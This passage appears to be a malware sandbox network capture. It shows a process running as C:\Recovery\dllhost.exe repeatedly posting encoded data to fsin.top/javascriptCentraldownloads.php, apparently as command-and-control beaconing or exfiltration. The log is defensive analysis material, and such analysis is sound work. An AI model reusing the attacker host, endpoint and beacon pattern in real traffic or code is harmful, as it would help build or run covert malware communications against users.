                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F44Up4BjhrJlwlOtjQ6xkU2FjWhxgEMWqYavzN0K3CUW%2FGErLRmQ6SslOuXAwTC1d4G8YB13uHktbFjHEeEL%2F48cV09sz4lqTLJuuK6G8OJmtvvCFsPeY63DQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b986a0542fb-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  96 | 192.168.2.4 | 49833 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:35.278922081 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:35.631474972 CEST | 1012 | OUT | Data Raw: 51 52 58 53 5a 5c 58 57 5c 5e 5a 51 54 54 57 52 57 50 5e 5e 56 5f 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QRXSZ\XW\^ZQTTWRWP^^V_QT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'"=#=;0S?]<>=>Y'(W%,*X23/,",%&G#.X!,
                                                  Aug 1, 2024 07:38:35.733030081 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:35.975475073 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:35 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=URu%2BUXIE88NHYkzQ1X8xSIkke4JrPQDpgWjGNMj5mUM45Hwhs7JaNxfT5p%2FazpV42JzuNUbzqG9cZVGbgmqEG13lAQv6kl3geNC5iUZrZT%2FBTm5uaI7odXMeEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b9d09527ced-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  97 | 192.168.2.4 | 49834 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:36.107959986 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:36.458986998 CEST | 1012 | OUT | Data Raw: 54 50 58 55 5f 5f 5d 51 5c 5e 5a 51 54 53 57 57 57 54 5e 59 56 58 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXU__]Q\^ZQTSWWWT^YVXQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!0)6'0/X(8!?%\';'R&%$3/3^!^;^15&G#.X!0
                                                  Aug 1, 2024 07:38:36.561866045 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:36.803786993 CEST | 580 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:36 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43Sx72Tlb%2BRE2kC6aLlP11otH61zwPw14F8rQ699JYVgD8jyvI2MU6zXwpRqdJKALD2vXQi63FWYTVXHoUPCffcFWN8ua3sathW4lC2UC0CLC0J0S53L7kBbpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ba23c160cc2-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  98 | 192.168.2.4 | 49835 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:36.933092117 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:37.287194967 CEST | 1008 | OUT | Data Raw: 54 5e 58 5d 5a 58 5d 57 5c 5e 5a 51 54 56 57 51 57 50 5e 5b 56 5b 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^X]ZX]W\^ZQTVWQWP^[V[Q[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"%1=]![$0S;)+.W*5-1811% U8.$5^#&%&G#.X!,
                                                  Aug 1, 2024 07:38:37.378962994 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:37.549602985 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:37 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wBtI8FlRFuuSOfaM269X7nWCDlpbZTHogV4Qj0JYJQTFWP%2FsEH%2FtFnSVzwjviymlf5mzO%2FeRTcJeaeB%2BkJS18f3JXuUbopIITkZV8Z1rIhbpGg5drA8owVfW0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ba75e8dc34d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  99 | 192.168.2.4 | 49836 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:37.683608055 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:38.040499926 CEST | 1012 | OUT | Data Raw: 54 56 58 55 5a 5d 58 54 5c 5e 5a 51 54 52 57 56 57 5e 5e 5c 56 5d 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TVXUZ]XT\^ZQTRWVW^^\V]Q][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"32*"$5]?-*5-&8<%"$3,R;X?"^ %&G#.X!4
                                                  Aug 1, 2024 07:38:38.163320065 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:38.399863005 CEST | 578 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:38 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkAec9bAGbOX3UApwVlSGjV3Snfn7y8pXHnBVOd1KHkGU8JdDI53Z2Ty1WqyrZynOoeNoN5OJd3aWIOGGQbPrreCScWDwEfWgLqxnYWRSD1oQr996VjmmOTJBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bac3ec319f7-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  100 | 192.168.2.4 | 49837 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:38.531377077 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:38.881041050 CEST | 1012 | OUT | Data Raw: 54 51 58 50 5f 5a 5d 51 5c 5e 5a 51 54 5f 57 5a 57 50 5e 59 56 59 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXP_Z]Q\^ZQT_WZWP^YVYQX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'26=+&%](+R=%:1;(1^$ ,W8?682%&G#.X!
                                                  Aug 1, 2024 07:38:38.984688044 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:39.217135906 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:39 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnBTm5LZ9RFY0JTP7z5aiv4WvWouCO6tkAXeJ6R6x6HsFmQiGdYGuurluRkTixHNeC45eKljZdbFiB7xRcr%2BzFLOvbM5f81Ogo%2F%2FHLHaIZu%2FKuaSeraZb8q7lA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bb15dbd43ff-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  101 | 192.168.2.4 | 49838 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:39.352999926 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:39.709064960 CEST | 1012 | OUT | Data Raw: 54 51 58 52 5a 5d 58 57 5c 5e 5a 51 54 54 57 55 57 5f 5e 5c 56 5a 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXRZ]XW\^ZQTTWUW_^\VZQZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$>!0+5>5& &/2/,.3!8,2&G#.X!,
                                                  Aug 1, 2024 07:38:39.819072008 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:39.970844030 CEST | 582 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:39 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4CLG0pONRbrIqTW043RPh5rxvk5dxIDUcdj5rskszNFt8j52rC0v0iBV9ohqMEY1L8GKpkjGcHLJh%2FL7Dril4cRwQrELYiBXTY4nk1RwMagm6wjxjD9S%2BzVmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bb698e2438b-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  102 | 192.168.2.4 | 49839 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:40.077512980 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1264
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  103 | 192.168.2.4 | 49840 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:40.106586933 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:40.459127903 CEST | 1012 | OUT | Data Raw: 54 55 58 53 5f 5a 58 52 5c 5e 5a 51 54 54 57 56 57 54 5e 5d 56 5d 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TUXS_ZXR\^ZQTTWVWT^]V]Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"3"!-03(2T)-%8%-1+/=3!_15&G#.X!,
                                                  Aug 1, 2024 07:38:40.579710960 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:40.828578949 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:40 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KigAdjpSot1u%2F00B%2FUSIlEfLsQBY7pozVrfbroozhIzznVtnYpw1Ex2V%2FlhGGWJoJPVARMaB5YDeFVmHdOVLnQjw7Z4olbKs5XwsvMeGELKafbM9xblqwhV0lQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bbb4a510cd9-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  104 | 192.168.2.4 | 49841 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:40.986021042 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:41.334069014 CEST | 1012 | OUT | Data Raw: 51 55 58 55 5f 5e 58 56 5c 5e 5a 51 54 51 57 54 57 5f 5e 56 56 59 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QUXU_^XV\^ZQTQWTW_^VVYQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[01:!-+$%3X<*R=]28'1[107/>'5&5&G#.X!
                                                  Aug 1, 2024 07:38:41.448802948 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:41.698100090 CEST | 594 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:41 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5a%2F2qQ0M1O7u%2Bqnaq7B6cFEIm9gt%2BUVDr232WPjypVAQXPPH0mFOn0tKlSq0UggPDna2MZbgCZ%2BRqqGQVNPwpNU%2BtGDz0ctxZo9xSqHfKc8MKChYg%2F%2BU48%2Fk6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bc0cef94369-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  105 | 192.168.2.4 | 49842 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:41.828728914 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:42.177973986 CEST | 1012 | OUT | Data Raw: 54 57 58 50 5f 5a 58 54 5c 5e 5a 51 54 55 57 56 57 5e 5e 5c 56 5e 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TWXP_ZXT\^ZQTUWVW^^\V^Q[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"%2Z!,$ )+!?5.\2(+V',.[%#8.05 &%&G#.X!(
                                                  Aug 1, 2024 07:38:42.285811901 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:42.436835051 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:42 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mouHYBJi%2F%2Fk2Bb9HiAtSLt21zbjwWjX66LR7E8Bar%2BDeX%2FtnwPfUooH65j0GmQNvnBIHcpU1FVnc8KzRNXDdGF3kLT7p859vJVcppAGy0hznD92PdqCYcXBIIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bc5fee3435d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  106 | 192.168.2.4 | 49843 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:42.595539093 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:42.943382025 CEST | 1012 | OUT | Data Raw: 51 52 58 50 5f 5d 58 5c 5c 5e 5a 51 54 51 57 53 57 50 5e 58 56 58 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QRXP_]X\\^ZQTQWSWP^XVXQY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_3Z"Z$6'\<>=5&'(1?>2U(S8?X6815&G#.X!
                                                  Aug 1, 2024 07:38:43.298593998 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:43.300574064 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:43.325967073 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:43 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BmZcHsn88A1gfsX%2F3%2BDRD8mIdJneW9B7d2djxsO3zxgvlM%2F%2FetnVOImjydX7E80hvq26AOeOj5K0SbhJzEjawLc48fbNh7xfvgmL3eUc50uB7LV8DXGsU1cXuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bcaea1bc35b-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  107 | 192.168.2.4 | 49844 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:43.452290058 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:43.802771091 CEST | 1012 | OUT | (request body)
                                                  Aug 1, 2024 07:38:43.896549940 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:44.137574911 CEST | 588 | IN | HTTP/1.1 200 OK
